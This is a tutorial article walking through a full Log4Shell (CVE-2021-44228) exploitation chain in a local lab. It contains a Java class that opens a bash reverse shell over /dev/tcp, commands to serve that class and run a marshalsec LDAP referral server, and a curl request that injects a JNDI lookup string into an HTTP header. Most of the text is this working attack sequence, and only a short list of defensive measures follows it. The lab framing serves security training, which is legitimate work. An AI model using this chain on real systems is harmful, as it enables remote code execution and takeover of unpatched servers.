Log4Shell (CVE-2021-44228) is notorious for its ability to enable unauthenticated remote code execution (RCE) — but more critically, it allows full reverse shell control when weaponized properly.
In this article, we’ll reproduce a complete Log4Shell-to-shell chain using a safe local lab.
Lab Objective
Trigger a reverse shell from a vulnerable Log4j instance to an attacker-controlled machine via JNDI LDAP exploitation.
Lab Setup:
- Vulnerable Java app (Log4j ≤ 2.14.1)
- Malicious LDAP server (marshalsec)
- Attacker listener (netcat)
1. Prepare the Listener
Start a reverse shell listener on your attacking machine:
nc -lvnp 44442. Create Exploit Class (Reverse Shell Payload)
Write a Java payload that connects back to the listener:
import java.io.IOException;
public class Exploit {
static {
try {
String[] cmd = {"/bin/bash", "-c", "bash -i >& /dev/tcp//4444 0>&1"};
Runtime.getRuntime().exec(cmd);
} catch (IOException e) {
e.printStackTrace();
}
}
}Compile and serve via HTTP:
javac Exploit.java
python3 -m http.server 80003. Run Malicious LDAP Server
Serve the class reference via marshalsec:
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer \
"http://:8000/#Exploit"4. Trigger the Exploit
Send the crafted payload to the vulnerable Log4j endpoint:
curl http://:8080 -H 'X-Api-Version: ${jndi:ldap://:1389/Exploit}'5. Confirm Reverse Shell
If successful, the listener should receive a connection:
whoami
hostname6. Defense Notes
- Restrict outbound traffic (egress filtering)
- Disable JNDI lookups entirely (
-Dlog4j2.formatMsgNoLookups=true) - Use JVM SecurityManager or sandboxing
- Monitor for suspicious DNS/LDAP outbound patterns
Final Thoughts
This lab demonstrates how a seemingly benign logging library can become a full-fledged entrypoint for remote shell access.
Mastering the end-to-end chain — from vector to payload delivery to shell — is essential for both offensive research and hardened defense.
Next: we’ll capture this exploit in real-time using tcpdump and correlate it with JVM behavior for deep forensic insights.